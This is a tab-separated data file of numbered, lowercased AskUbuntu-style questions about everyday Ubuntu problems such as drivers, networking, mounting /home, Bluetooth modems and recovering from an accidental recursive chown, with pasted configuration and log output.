2927	best way to remote restart ubuntu from windows machine	background : i 'm looking to put a series of ubuntu machines into retail locations , they 're being used as dumb kiosks to show a series of slides onto large lcd panel tv screens . once installed , they wo n't have a keyboard or mouse connected but will have a fixed ip on the local network . everything is configured to auto-start , no automatic updates , no power saving etc - i think we 're pretty-much good to go apart from one thing . i need the retail staff to be able to restart the boxes if a problem arises . we have vnc running ( now that we 've turned off desktop enhancements ! ) so that we can remotely get into the machines if we need to , but that 's not something we would allow the retail staff to do . the machines are going to be physically 'out of the way ' ( probably in the ceiling space ) so the power button is not easily accessible ! . i 'd like to have some means of allowing the retail staff to restart the ubuntu machine , from the desktop of one of their windows terminals . i do n't really want to give them some kind of raw terminal access ( the command line will frighten them ! ) and i do n't want them to use vnc ( as stated above ) . ideally there would be an icon on the windows desktop , they double-click it , reply to a simple 'are you sure ? ' prompt , and then the ubuntu box is told to restart . the windows side of that wo n't be a problem , we can write something using delphi , python & qt4 , whatever - it 's the ubuntu side of it i 'm stuck with . out of sight/view , could i have a windows program open a terminal across the network and tell ubuntu to restart ? is this what ssh could be used for ( i have never set that kind of thing up ) . the windows programming side is n't really an issue , it 's just that i 'm a total ubuntu noob and do n't know where to start from the platform point of view . the other thing we considered is also having the machine automatically restart itself at a set time each day ( obviously out of store hours ! ) . to me , that seems a bit unnecessary ( though forcing a restart once a week/month might be worthwhile ) . any thoughts or suggestions ? being able to restart the box on demand across the network is my prime requirement .
2936	what software is available to use tv tuner card ?	i am looking for software programs to use my tv tuner card in ubuntu . i have mythtv installed and use it quite a bit . but i am looking for a program that can tune my tuner card in just a window , not only a full-screen . e.g . - i would like to watch something in a browser , while having a tv channel playing in another window . maybe a program like vlc that can control my tuner ?
2938	how do i display more than 5 bookmarks in gnome-panel `` places '' menu ?	i found a thread on the ubuntu forums , but it requires me to change the source of gnome-panel and recompile . is that really the only option if i want to see more than 5 bookmarks in the `` places '' menu ? i have a huge monitor -- it seems funny to only show two bookmarks and push the others into a separate `` bookmarks '' sub-menu .
2943	how can i check if a package is installed ( no superuser privileges ) ?	at our university we can get almost any ubuntu package installed we want , but we are not superusers ourselves ( we need to request packages being installed ) . with some libraries it is not always easy to know whether the package is already installed or not . is there a simple way/command to check this ?
2946	what are some good gui diff and merge applications available for ubuntu ?	what are some alternatives to winmerge and the pros and cons of each ?
2951	how should i set up a linux file server for data sharing with windows pcs and a ps3 ?	i have the following pieces of hardware i would like to network mostly for file sharing ( media primarily ) : 1 gaming laptop , 1 i7 ( 2.3tb storage ) desktop , 1 p4 desktop ( 500g storage ) , and 1 250gig ps3 . i am looking to setup a linux host ( with a ps3 media server ) with the i7 desktop but am concerned about leaving it on all the time . what stripped down , low energy usage distro can i couple with which windows & ps3 friendly software ? also , how should i reformat my i7 ( in terms of partitions , raid options , whatever ) ? it has 2 1tb drives ( likely adding a third ) , and 1 320 gig .
2952	upload photos to facebook page ( not personal profile )	a couple of the various linux photo organizer applications ( shotwell & f-spot , at least ) let you upload pictures to facebook , but as far as i can see , that 's limited only to albums on your personal page . am i just missing something , and it is actually possible to use either shotwell or f-spot to upload to albums in a page you are an administrator for ? if not , is there another picasa-type program that has this feature ?
2953	is there a linux software raid that can be shared with a windows installation ?	what are the options i 've got when it comes to raid and windows ?
2960	is there a way to adjust a `` global equalizer '' ?	the other day , i plugged a poor quality set of speakers into my pc ( running ubuntu 10.04 ) . i would have liked to have made some adjustments to some sort of equalizer , but could n't find anything that affected the whole pc . is there such a thing ?
2964	where can i find the source code for the ubuntu kernel ?	i 'd like to build my own copy of the ubuntu kernel . where can i get the source code ?
2968	ldap server set-up	i 'd like to set up ldap to act as central authentication of 2 web applications running on the same server . whats the simplest step-by-step way to go about this from scratch ? in the long run i 'd also like to be able to administer the users on the system as simply as possible ( think end users , not devs ! )
2970	where can i change the automatic lock screen preference ?	i 'm using ubuntu in a vm , so , i leave it idle from time to time . when i go back obviously the screen is locked , but i would like to configure the idle time for something around 10 minutes . where can i do this ?
2977	how to assign a serial port to my bluetooth phone ?	i used hcitool scan to get the mac address of my phone . then i used sdbtool browse to find the channel of the `` serial port '' service . i put this information into /etc/bluetooth/rfcomm.conf and this is what the file looks like : # # rfcomm configuration file . # rfcomm0 { # automatically bind the device at startup bind yes ; # bluetooth address of the device device 00:00:00:00:00:00 ; # rfcomm channel for the connection channel 00 ; # description of the connection comment `` ... '' ; } note : the mac address and channel are in there ... i just do n't want to print them here . i restarted the bluetooth service and went to /dev - but i could n't see rfcomm0 or anything close to it in there . what am i doing wrong ?
2980	how can i make a program ( using sdl ) built on ubuntu work on other systems ?	i 'm writing a program that uses openal . when i link against it ( i 'm using cmake ) , it also links against libpulse - pulseaudio . this results in the binary not working on other systems . can i somehow not link against pulseaudio and still use openal on ubuntu ? edit : i just figured something out : it 's not openal that 's dragging pulseaudio in , it 's sdl . is there anything i can do about that ?
2988	how do i install and manage rpms ?	i have a burning desire to install rpms onto my ubuntu installation - is this possible ? can i use yum - or another rpm package management tool ?
2995	how is the default term shell variable value set ?	after upgrading to maverick i have my term variable set to 'dumb ' , this does not happen with the same home dir running from lucid and i did n't manually changed anything related to term . any idea where is the term variable expected to be set from ?
2997	dual boot - ubuntu 9.10 , 10.04 - /home can not be initialized upon startup	i recently installed 9.10 64-bit on a system that had 10.04 already installed . i thought i performed this installation correctly , but when i came to grub2 and chose the option i wanted , i got some errors . first , i got the following message before the log in screen appeared : the disk drive for /home is not ready yet or not present . continue to wait ; or press s to skip mounting or m for manual recovery . i rebooted and logged into the freshly installed 9.10 boot and this worked fine . i found the partition that 10.04 is on and created a user directory in /home that is a copy of the 9.10 /home . i named the user directory the same as it was previously , so there was no difference . i then changed ownership and group of this newly created directory and then rebooted . i got the same error : the disk drive for /home is not ready yet or not present . continue to wait ; or press s to skip mounting or m for manual recovery . but this time when i press s to skip , i was able to log in and see my desktop . the actions i did seemed to allow for log in but still the mounting of /home is not working as it should . one thing i should mention . when installing 9.10 64-bit , i had some extra hard disk space available and i chose to format this to ext4 and then mount it to /home . this may be causing problems , but i thought when doing this it would mount to the /home for the new installation . it seemed to try to mount it on the old installation , though ( the 10.04 one ) . i hope this was n't too confusing . any help is much appreciated . thanks in advance . edit - for the 9.10 installation /etc/fstab : # /etc/fstab : static file system information . # # use 'blkid -o value -s uuid ' to print the universally unique identifier # for a device ; this may be used with uuid= as a more robust way to name # devices that works even if disks are added and removed . see fstab ( 5 ) . # # < file system > < mount point > < type > < options > < dump > < pass > proc /proc proc nodev , noexec , nosuid 0 0 # / was on /dev/sda1 during installation uuid=10270f21-1c42-494b-bd3f-813c23f6d518 / ext4 errors=remount-ro 0 1 # /home was on /dev/sda6 during installation uuid=fc128610-a6d5-4d23-9898-064580419da0 /home ext4 defaults 0 2 # swap was on /dev/sda5 during installation uuid=d3644f61-b65c-4f30-9eb5-cda163f9fce5 none swap sw 0 0 for the 10.04 installation : # /etc/fstab : static file system information . # # use 'blkid -o value -s uuid ' to print the universally unique identifier # for a device ; this may be used with uuid= as a more robust way to name # devices that works even if disks are added and removed . see fstab ( 5 ) . # # < file system > < mount point > < type > < options > < dump > < pass > proc /proc proc defaults 0 0 # / was on /dev/sda6 during installation uuid=28fd6eb0-38a2-4c22-86d8-f7dce7508ac4 / ext4 errors=remount-ro 0 1 # /home was on /dev/sda7 during installation uuid=97f82eca-0fdd-49e1-a12b-b4e1f6adbcbb /home ext4 defaults 0 2 # swap was on /dev/sda5 during installation uuid=d3644f61-b65c-4f30-9eb5-cda163f9fce5 none swap sw 0 0 /dev/scd0 /media/cdrom0 udf , iso9660 user , noauto , exec , utf8 0 0 edit 2 : fdisk -l output : disk /dev/sda : 250.1 gb , 250059350016 bytes 255 heads , 63 sectors/track , 30401 cylinders units = cylinders of 16065 * 512 = 8225280 bytes disk identifier : 0xcbcbcbcb device boot start end blocks id system /dev/sda1 * 1 6231 50049483+ 83 linux /dev/sda2 6232 30401 194145525 5 extended /dev/sda5 12158 12773 4939776 82 linux swap / solaris /dev/sda6 6232 12157 47600532 83 linux /dev/sda7 12774 30401 141596878+ 83 linux partition table entries are not in disk order blkid /dev/sda* output : /dev/sda1 : uuid= '' 10270f21-1c42-494b-bd3f-813c23f6d518 '' type= '' ext4 '' /dev/sda5 : uuid= '' d3644f61-b65c-4f30-9eb5-cda163f9fce5 '' type= '' swap '' /dev/sda6 : uuid= '' 28fd6eb0-38a2-4c22-86d8-f7dce7508ac4 '' type= '' ext4 '' /dev/sda7 : uuid= '' 97f82eca-0fdd-49e1-a12b-b4e1f6adbcbb '' type= '' ext4 ''
3002	changing my aim alias in empathy does n't work	i try to change my nickname for my aim account in empathy . and the change does n't seem to take . whatever i do , it just kind of stays the same . it works fine for my google talk account ... iunno .
3005	is it possible to install ubuntu on a corporate laptop that is currently running windows xp with utimaco 's disk encryption software ?	a new laptop issued to me is now running a product called `` safeguard enterprise 5.35 utimaco software '' . has anyone had success installing ubuntu in this situation ?
3006	how do i handle patch rejects after applying patches with uupdate ?	i used uupdate to update a source package from 0.7.0 to 0.7.3 . it does this update with patches and i had a few patch rejects . i am unsure what to do next . do i : edit the old source package ( 0.7.0 ) and then re-run uupdate ? edit the new source package ( 0.7.3 ) and then re-run uupdate ? edit the .rej files directly ? use a tool such as kdiff3 ? try something else ? at this point , i 'm thinking that the answer is to use a tool which is more along the lines of what i 'm familiar with ( coming from a tortoise merge and clearcase merge background ) . i have searched high and low for how people manage patch rejects and i 've had no luck , so i will gladly rtfm if you can provide a link to a fm if one exists .
3008	used recursive chown on the root directory	im gon na need some help restoring my ssh settings as i screwed everything up by calling this command : chown -r user / at the moment im not able to access the site through ssh/ftp since the ownership of all the files have been changed . i dont want to reset every ownership but if i could get ssh working i would be able to create a backup of my files and then get a clean install of ubuntu on my server . here is the error that i get when im trying to restart ssh : /var/run/sshd must be owned by root and not group or world-writable . im running ubuntu 10.04 lts . any help is very much appreciated . p.s . i am able to run ssh commands on a browser based ajax console that my hosting company ( linode ) provides . thanks
3022	weird mouse problem	i 'm facing a weird problem . my mouse automatically focuses on menu items . i 'm unable to navigate menus with keyboard if the cursor rests on a menu item as it keeps stealing focus . i can live with this behaviour in regular apps but it wo n't let me play any full-screen games as the cursor remains locked in a fixed position . i tried turning off compiz and removing all the dotfiles but it did n't help . here is a video my mouse stealing focus : http : //dl.dropbox.com/u/275756/mouse.ogv
3024	good nvidia drivers for a geforce gt 330m on a vaio laptop ?	with the latest 3 distribution versions of ubuntu i 've always had problems with nvidia gpus . even when i installed the official commercial drivers ( which are not in the repositories and are shown as proprietary ) i also had problems with the display . the specific version of the gpu i 'm using now is geforce gt 330m on a vaio laptop . can you guys recommend a driver that is stable and works well , supporting most ( if not all ) gpu features for nvidia gpus ? have you had the same problems and how did you solve them ?
3030	how to set up good video support on radeon 3850	so , i 've got radeon 3850 agp card . it seems that all videos and graphics are handled by cpu , according to cpu usage . all effects are enabled and working ( like compiz ) , but videos and 3d are extremely slow and low-fps , though i use proprietary ati drivers . what do i need to do to get normal fps ? ready to answer additional questions . so , i think 10.7 finally installed , but nothing new happend . hi-res video still 0.3 fps . ( video is 1280x720 , screen is 1920x1080 ) . decided to show my xorg.conf : section `` serverlayout '' identifier `` aticonfig layout '' screen 0 `` aticonfig-screen [ 0 ] -0 '' 0 0 endsection section `` module '' endsection section `` monitor '' identifier `` aticonfig-monitor [ 0 ] -0 '' option `` vendorname '' `` ati proprietary driver '' option `` modelname '' `` generic autodetecting monitor '' option `` dpms '' `` true '' endsection section `` device '' identifier `` aticonfig-device [ 0 ] -0 '' driver `` fglrx '' busid `` pci:1:0:0 '' endsection section `` screen '' identifier `` aticonfig-screen [ 0 ] -0 '' device `` aticonfig-device [ 0 ] -0 '' monitor `` aticonfig-monitor [ 0 ] -0 '' defaultdepth 24 subsection `` display '' viewport 0 0 depth 24 endsubsection endsection thanks everyone , i also wanted to ask : everybody tell me , that this parameter : creitve @ localhost : ~ $ glxinfo|grep render direct rendering : no ( libgl_always_indirect set ) opengl renderer string : ati radeon hd 3850 must be `` yes '' , but i did n't manage to enable it . what do i need to get it running ? im sure , it 's 100 % related to my problem , right ?
3031	can not connect modem ( /dev/ttysl0 ) using gnome-ppp - dial-up connection	i 'm trying to connect my toshiba satellite running ubuntu 10.04 to my eris running android 2.1 through a bluetooth connection and establish a dial-up connection ( dun ) with the modem . i can connect my phone to my laptop , and i can detect my modem ( after installing drivers ) , which is located at /dev/ttysl0 . but when i launch gnome-ppp and enter my phone number ( 123 for pda-net ) i get a dialog that says `` connecting ... sending password '' with log and cancel buttons . the log shows this : -- > wvdial : internet dialer version 1.60 -- > can not get information for serial port . -- > initializing modem . -- > sending : atz atz ok -- > sending : atq0 v1 e1 s0=0 & c1 & d2 +fclass=0 atq0 v1 e1 s0=0 & c1 & d2 +fclass=0 ok -- > modem initialized . -- > please enter password ( or empty password to stop ) : -- > configuration does not specify a valid login name . the pda-net dun protocol is running and shows no error . any ideas ? any help is much appreciated .
3032	why is n't gwibber working ?	( i thought i posted this earlier , but it 's not here , so i guess i did n't . ) so , gwibber is n't working . it as kind of almost working when i installed ubuntu ( 10.4 , 64-bit ) -- the `` broadcast accounts '' option under my name was doing what it does , but i still have n't seen the program actually function -- and now , it 's not opening , and `` broadcast accounts '' is not opening , but system- > prefrences- > broadcast preferences is opening . i had a problem at the beginning where my facebook account would n't register properly in `` broadcast accounts '' . then , i installed some basic update to gwibber , and then that worked fine . but just a little while later , nothing was working at all . in case this is a clue : the top-right notification boxes seem to show up a whole box-area lower than they should . this is another annoyance , but i feel like it might possibly be solved if i get gwibber working .
3036	what 's apt-get 's equivalent option of this dpkg command ?	dpkg -l < package > this command gives me a list of all the installed files , what 's apt-get 's equivalent option for it ? i read the man page but could n't figure out .
3037	how do i set gnome to `` focus follows mouse '' ?	i have two monitors that i use for development . i would like to use sloppy focus for switching between windows . sloppy focus -- whatever you mouse is hovering over is in focus . i know it 's available in ubuntu 10.04 . how do you enable it ?
3043	ubuntu packaging in bzr	a while ago there was talk of moving all ( or at least some ? ) of the packaging effort to bzr branches on launchpad . i seem to remember there were a number of benefits mentioned , such as making it easier for new developers/packagers to contribute . can anyone update me on whether this happened and what the benefits would be ? ( i might have got completely the wrong end of the stick on this , so feel free to correct me ... )
3045	how to disable gnome keyring ?	i want to disable gnome keyring globally on my machine . so i deleted the lines auth optional pam_gnome_keyring.so session optional pam_gnome_keyring.so auto_start in /etc/pam.d/gdm . it seems to me that this has no effect . when i lock in the syslog writes aug 24 18:37:03 foobar gnome-screensaver-dialog : gkr-pam : unlocked login keyring and another user sees a menu window where he hs to enter his credentials . so what is the correct way to disable keyring for every user on that machine ?
3050	jack and pulseaudio	i want to run pulseaudio from startup to deal with system sounds etc and be able to run jack from qjackctl for use with audio applications ( lmms , ardour , rosegarden etc ) i 'm having issues when i start up , the sound applet does not allow me to control the volume . when i click sound preferences it says `` waiting for sound system to respond '' yet the sound still plays in rhythmbox etc .
3051	how can i get a kernel core dump	we 're trying to debug a kernel panic/oops on ubuntu 10.04 . the stacktrace is n't quite enough for us . how can we configure the system to spit out a core dump and where can we find it after the crash ? there is a lot of information on how to get a user-mode core dump , but very little ( or old ) information on getting a kernel core dump . lkcd exists , but looks as though it has n't been updated since 2002 .
3055	automatically add new wireless access points	i 'm running lucid on a few laptops , with xfce as the desktop environment . before lucid , the little networkmanager tray widget would automatically scan for access points for me . now , however , i find that i have to go run iwlist myself to look for ssids ( if i do n't know one already ) and manually add that to the list . once i 've done that , then it 'll automatically connect ( if the ap is configured that way ) . part of what makes this a real pain is that the tray widget ( sometimes ) seems to not show itself at all when there 's no current connection and no known access points . i have to kill networkmanager ( which is a pain , because init really wants to re-launch it ) , run iwlist to find an ssid , go to the ( now showing ) tray widget and add the ssid , and then re-start networkmanager . i realize that the widget is just messing with a config file or two , and i 'm happy to fool with those manually , but what i 'd really like is for it to work the way it used to and just do the scan for me . note that once i 've got a connection up , then it shows me all the aps it can see , as before . i acknowledge that it 's possible i screwed up some setup file , but i 've really tried scrubbing everything back to `` as new '' state and that has n't helped . am i crazy or did that stuff really change ?
3056	how do i use a second hdmi-connected monitor ?	i 've looked around for answers to this , but nothing i 've found has been relevant , which seems a little weird but there you go . all i 'd like to do is drive a second monitor via hdmi from a laptop . from windows 7 on this laptop that works fine , of course ; it 's actually surprisingly nice . thus i know the hardware is ok. from another laptop i 've got , one with an nvidia card , the nvidia settings app seems to do the trick ( though it 's clunky ) . however , this laptop i 'm using has an intel gpu , and i ca n't find any information about how to get it to recognize that a second display is available . is it even possible to do this dynamically , or do i need to statically alter my `` xorg.conf '' to make the second screen available ? edit — sorry i should have noted that i run xfce .
3057	ubuntu linux ufw firewall , local intranet access	at home , i have ubuntu server with the ufw firewall . what command do i type to turn on local intranet access to my web server , but keep the outside world out from my dsl modem ?
3063	share wireless connection with wired ethernet port	that 's pretty much it . if i connect to the internet on wlan0 , how can i share this connection with a device plugged into my wired ethernet port eth0 ?
3070	how do i configure touchscreen on my hp tx1000 laptop running xubuntu ?	i tried looking online for all possible solutions and even installing evtouch package , but nothing seems to work . i know that the tx1000 series laptops are notoriously linux unfriendly . does anyone have any ideas on how to get the touchscreen to work on them ?
3071	swiftfox without the file , view toolbar	is there a way to remove the file , edit , view ... toolbar from firefox ( so that i will have only the address toolbar visible ) ? i think in windows from version 3.5 you can just right click on the toolbar and you can just unselect it ... i do n't have firefox installed , i use swiftfox ...
3076	system slows down until i move the mouse	i installed a bunch of time many linux distro and never got this `` bug '' . it 's kind of weird , the system run really fine , but when there is operation like update manager or download via any browser , etc . it goes well until a moment ( never the same delay ) and radically slow down or even stop , the pc does n't freeze but the operation is paused , and when i touch the touchpad it continue . i suspected hard drive issue , so i changed it , a bios issue , except ahci i ca n't modify anything ... , also suspected that acpi stop the drive so i unchecked the box but still the same bug . if anyone has already got this ... it 's not a deadly bug but a big annoyance .
3084	how do i get a 3g usb modem to work ?	since at least jaunty , i 've tried to get my wife 's 3g usb modem to work on ubuntu , always with the same result - instant , complete system freeze . i 've tried installing`wvdial and usb-modeswitch , i 've read tons of documentation but it gets quite disjointed from one release to the next , nothing works . i ca n't run lsusb because the system hangs immediately . i 'm using lucid and it 's a rogers `` rocket stick '' ( in canada )
3085	belkin wireless 802.11g usb network adapter not working	hello everyone i really am new to this ubuntu thing . i am now running the latest ubuntu and windows on the same pc . wireless connections work fine on windows but connects and disconnects on ubuntu . i am on adsl with wireless router ( belkin and belkin wireless network adaptor ) . russell @ ubuntu : ~ $ dmesg | grep rt [ 0.000000 ] kernel supported cpus : [ 0.000000 ] movable zone start pfn for each node [ 0.000000 ] acpi : pm-timer io port : 0x408 [ 0.000000 ] allocating pci resources starting at 80000000 ( gap : 80000000:50000000 ) [ 0.000000 ] booting paravirtualized kernel on bare hardware [ 0.000000 ] enabling unmasked simd fpu exception support ... done . [ 0.000000 ] virtual kernel memory layout : [ 0.004287 ] mce : cpu supports 4 mce banks [ 0.035629 ] ftrace : converting mcount calls to 0f 1f 44 00 00 [ 0.185268 ] acpi : ( supports s0 s1 s4 s5 ) [ 0.193969 ] pci 0000:00:1c.0 : pme # supported from d0 d3hot d3cold [ 0.194048 ] pci 0000:00:1d.0 : reg 20 io port : [ 0xbc00-0xbc1f ] [ 0.194117 ] pci 0000:00:1d.1 : reg 20 io port : [ 0xb000-0xb01f ] [ 0.194189 ] pci 0000:00:1d.2 : reg 20 io port : [ 0xb400-0xb41f ] [ 0.194257 ] pci 0000:00:1d.3 : reg 20 io port : [ 0xb800-0xb81f ] [ 0.194485 ] pci 0000:00:1e.2 : reg 10 io port : [ 0xc000-0xc0ff ] [ 0.194495 ] pci 0000:00:1e.2 : reg 14 io port : [ 0xc400-0xc43f ] [ 0.194554 ] pci 0000:00:1e.2 : pme # supported from d0 d3hot d3cold [ 0.193969 ] pci 0000:00:1c.0 : pme # supported from d0 d3hot d3cold [ 0.194048 ] pci 0000:00:1d.0 : reg 20 io port : [ 0xbc00-0xbc1f ] [ 0.194117 ] pci 0000:00:1d.1 : reg 20 io port : [ 0xb000-0xb01f ] [ 0.194189 ] pci 0000:00:1d.2 : reg 20 io port : [ 0xb400-0xb41f ] [ 0.194257 ] pci 0000:00:1d.3 : reg 20 io port : [ 0xb800-0xb81f ] [ 0.194485 ] pci 0000:00:1e.2 : reg 10 io port : [ 0xc000-0xc0ff ] [ 0.194495 ] pci 0000:00:1e.2 : reg 14 io port : [ 0xc400-0xc43f ] [ 0.194554 ] pci 0000:00:1e.2 : pme # supported from d0 d3hot d3cold [ 0.194714 ] pci 0000:00:1f.1 : reg 10 io port : [ 0x00-0x07 ] [ 0.194724 ] pci 0000:00:1f.1 : reg 14 io port : [ 0x00-0x03 ] [ 0.194735 ] pci 0000:00:1f.1 : reg 18 io port : [ 0x00-0x07 ] [ 0.194746 ] pci 0000:00:1f.1 : reg 1c io port : [ 0x00-0x03 ] [ 0.194759 ] pci 0000:00:1f.1 : reg 20 io port : [ 0xf000-0xf00f ] [ 0.194819 ] pci 0000:00:1f.2 : reg 10 io port : [ 0xd000-0xd007 ] [ 0.194829 ] pci 0000:00:1f.2 : reg 14 io port : [ 0xd400-0xd403 ] [ 0.194714 ] pci 0000:00:1f.1 : reg 10 io port : [ 0x00-0x07 ] [ 0.194724 ] pci 0000:00:1f.1 : reg 14 io port : [ 0x00-0x03 ] [ 0.194735 ] pci 0000:00:1f.1 : reg 18 io port : [ 0x00-0x07 ] [ 0.194746 ] pci 0000:00:1f.1 : reg 1c io port : [ 0x00-0x03 ] [ 0.194759 ] pci 0000:00:1f.1 : reg 20 io port : [ 0xf000-0xf00f ] [ 0.194819 ] pci 0000:00:1f.2 : reg 10 io port : [ 0xd000-0xd007 ] [ 0.194829 ] pci 0000:00:1f.2 : reg 14 io port : [ 0xd400-0xd403 ] [ 0.194839 ] pci 0000:00:1f.2 : reg 18 io port : [ 0xd800-0xd807 ] [ 0.194848 ] pci 0000:00:1f.2 : reg 1c io port : [ 0xdc00-0xdc03 ] [ 0.194858 ] pci 0000:00:1f.2 : reg 20 io port : [ 0xe000-0xe00f ] [ 0.194892 ] pci 0000:00:1f.2 : pme # supported from d3hot [ 0.194957 ] pci 0000:00:1f.3 : reg 20 io port : [ 0x500-0x51f ] [ 0.195097 ] pci 0000:01:00.0 : reg 24 io port : [ 0x9000-0x907f ] [ 0.195212 ] pci 0000:00:1c.0 : bridge io port : [ 0x9000-0x9fff ] [ 0.195287 ] pci 0000:02:05.0 : reg 10 io port : [ 0xa000-0xa0ff ] [ 0.195360 ] pci 0000:02:05.0 : supports d1 d2 [ 0.194839 ] pci 0000:00:1f.2 : reg 18 io port : [ 0xd800-0xd807 ] [ 0.194848 ] pci 0000:00:1f.2 : reg 1c io port : [ 0xdc00-0xdc03 ] [ 0.194858 ] pci 0000:00:1f.2 : reg 20 io port : [ 0xe000-0xe00f ] [ 0.194892 ] pci 0000:00:1f.2 : pme # supported from d3hot [ 0.194957 ] pci 0000:00:1f.3 : reg 20 io port : [ 0x500-0x51f ] [ 0.195097 ] pci 0000:01:00.0 : reg 24 io port : [ 0x9000-0x907f ] [ 0.195212 ] pci 0000:00:1c.0 : bridge io port : [ 0x9000-0x9fff ] [ 0.195287 ] pci 0000:02:05.0 : reg 10 io port : [ 0xa000-0xa0ff ] [ 0.195360 ] pci 0000:02:05.0 : supports d1 d2 [ 0.195367 ] pci 0000:02:05.0 : pme # supported from d1 d2 d3hot d3cold [ 0.195437 ] pci 0000:00:1e.0 : bridge io port : [ 0xa000-0xafff ] [ 0.224801 ] system 00:01 : ioport range 0x4d0-0x4d1 has been reserved [ 0.224807 ] system 00:01 : ioport range 0x290-0x29f has been reserved [ 0.224813 ] system 00:01 : ioport range 0x800-0x87f has been reserved [ 0.224819 ] system 00:01 : ioport range 0x880-0x88f has been reserved [ 0.224836 ] system 00:0b : ioport range 0x400-0x4bf could not be reserved [ 0.279897 ] pcieport 0000:00:1c.0 : irq 24 for msi/msi-x – raven aug 27 at 0:42 edit [ 0.195367 ] pci 0000:02:05.0 : pme # supported from d1 d2 d3hot d3cold [ 0.195437 ] pci 0000:00:1e.0 : bridge io port : [ 0xa000-0xafff ] [ 0.224801 ] system 00:01 : ioport range 0x4d0-0x4d1 has been reserved [ 0.224807 ] system 00:01 : ioport range 0x290-0x29f has been reserved [ 0.224813 ] system 00:01 : ioport range 0x800-0x87f has been reserved [ 0.224819 ] system 00:01 : ioport range 0x880-0x88f has been reserved [ 0.224836 ] system 00:0b : ioport range 0x400-0x4bf could not be reserved [ 0.279897 ] pcieport 0000:00:1c.0 : irq 24 for msi/msi-x [ 0.279910 ] pcieport 0000:00:1c.0 : setting latency timer to 64 [ 0.287215 ] serial : 8250/16550 driver , 4 ports , irq sharing enabled [ 0.291459 ] input : macintosh mouse button emulation as /devices/virtual/input/input2 [ 0.299338 ] ehci_hcd 0000:00:1d.7 : cache line size of 128 is not supported [ 0.346769 ] ehci_hcd 0000:00:1d.7 : usb 2.0 started , ehci 1.00 [ 0.347042 ] hub 1-0:1.0 : 8 ports detected [ 0.347617 ] hub 2-0:1.0 : 2 ports detected [ 0.348036 ] hub 3-0:1.0 : 2 ports detected [ 0.348459 ] hub 4-0:1.0 : 2 ports detected [ 0.348891 ] hub 5-0:1.0 : 2 ports detecte – raven aug 27 at 0:43 edit [ 0.279910 ] pcieport 0000:00:1c.0 : setting latency timer to 64 [ 0.287215 ] serial : 8250/16550 driver , 4 ports , irq sharing enabled [ 0.291459 ] input : macintosh mouse button emulation as /devices/virtual/input/input2 [ 0.299338 ] ehci_hcd 0000:00:1d.7 : cache line size of 128 is not supported [ 0.346769 ] ehci_hcd 0000:00:1d.7 : usb 2.0 started , ehci 1.00 [ 0.347042 ] hub 1-0:1.0 : 8 ports detected [ 0.347617 ] hub 2-0:1.0 : 2 ports detected [ 0.348036 ] hub 3-0:1.0 : 2 ports detected [ 0.348459 ] hub 4-0:1.0 : 2 ports detected [ 0.348891 ] hub 5-0:1.0 : 2 ports detected [ 0.349073 ] pnp : ps/2 appears to have aux port disabled , if this is incorrect please boot with i8042.nopnp [ 0.349998 ] serio : i8042 kbd port at 0x60,0x64 irq 1 [ 0.350404 ] rtc_cmos 00:03 : rtc can wake from s4 [ 0.350475 ] rtc_cmos 00:03 : rtc core : registered rtc_cmos as rtc0 [ 0.350506 ] rtc0 : alarms up to one month , 242 bytes nvram , hpet irqs – raven aug 27 at 0:43 edit [ 0.349073 ] pnp : ps/2 appears to have aux port disabled , if this is incorrect please boot with i8042.nopnp [ 0.349998 ] serio : i8042 kbd port at 0x60,0x64 irq 1 [ 0.350404 ] rtc_cmos 00:03 : rtc can wake from s4 [ 0.350475 ] rtc_cmos 00:03 : rtc core : registered rtc_cmos as rtc0 [ 0.350506 ] rtc0 : alarms up to one month , 242 bytes nvram , hpet irqs [ 0.355364 ] using ipi no-shortcut mode [ 0.356078 ] rtc_cmos 00:03 : setting system clock to 2010-08-27 10:13:42 utc ( 1282904022 ) [ 0.763804 ] sd 3:0:0:0 : [ sdb ] write cache : enabled , read cache : enabled , does n't support dpo or fua [ 0.763811 ] sd 2:0:0:0 : [ sda ] write cache : enabled , read cache : enabled , does n't support dpo or fua [ 0.826587 ] udev : starting version 151 [ 0.860561 ] hub 1-1:1.0 : 4 ports detected [ 1.116873 ] usb mass storage support registered . [ 2.734937 ] hub 3-2:1.0 : 4 ports detected [ 13.477205 ] udev : starting version 151 – raven aug 27 at 0:43 edit [ 0.355364 ] using ipi no-shortcut mode [ 0.356078 ] rtc_cmos 00:03 : setting system clock to 2010-08-27 10:13:42 utc ( 1282904022 ) [ 0.763804 ] sd 3:0:0:0 : [ sdb ] write cache : enabled , read cache : enabled , does n't support dpo or fua [ 0.763811 ] sd 2:0:0:0 : [ sda ] write cache : enabled , read cache : enabled , does n't support dpo or fua [ 0.826587 ] udev : starting version 151 [ 0.860561 ] hub 1-1:1.0 : 4 ports detected [ 1.116873 ] usb mass storage support registered . [ 2.734937 ] hub 3-2:1.0 : 4 ports detected [ 13.477205 ] udev : starting version 151 [ 13.686799 ] linux agpgart interface v0.103 [ 13.953260 ] usb serial support registered for generic [ 13.958045 ] usb serial support registered for gsm modem ( 1-port ) [ 13.973144 ] option 3-2.4:1.0 : gsm modem ( 1-port ) converter detected [ 13.973594 ] usb 3-2.4 : gsm modem ( 1-port ) converter now attached to ttyusb0 [ 13.973643 ] option 3-2.4:1.1 : gsm modem ( 1-port ) converter detected [ 13.973747 ] usb 3-2.4 : gsm modem ( 1-port ) converter now attached to ttyusb1 [ 13.686799 ] linux agpgart interface v0.103 [ 13.953260 ] usb serial support registered for generic [ 13.958045 ] usb serial support registered for gsm modem ( 1-port ) [ 13.973144 ] option 3-2.4:1.0 : gsm modem ( 1-port ) converter detected [ 13.973594 ] usb 3-2.4 : gsm modem ( 1-port ) converter now attached to ttyusb0 [ 13.973643 ] option 3-2.4:1.1 : gsm modem ( 1-port ) converter detected [ 13.973747 ] usb 3-2.4 : gsm modem ( 1-port ) converter now attached to ttyusb1 [ 13.973783 ] option 3-2.4:1.2 : gsm modem ( 1-port ) converter detected [ 13.973908 ] usb 3-2.4 : gsm modem ( 1-port ) converter now attached to ttyusb2 [ 14.068472 ] parport_pc 00:09 : reported by plug and play acpi [ 14.068526 ] parport0 : pc-style at 0x378 , irq 7 [ pcspp , tristate ] [ 14.172348 ] lp0 : using parport0 ( interrupt-driven ) . [ 16.456225 ] ppdev : user-space parallel port driver russell @ ubuntu : ~ $
3089	what can we do to increase participation in global jams ?	our global jam is coming up this weekend , and i wonder what we can do to increase participation and also collaboration between the different events . maybe we still have time to implement some of the suggestions .
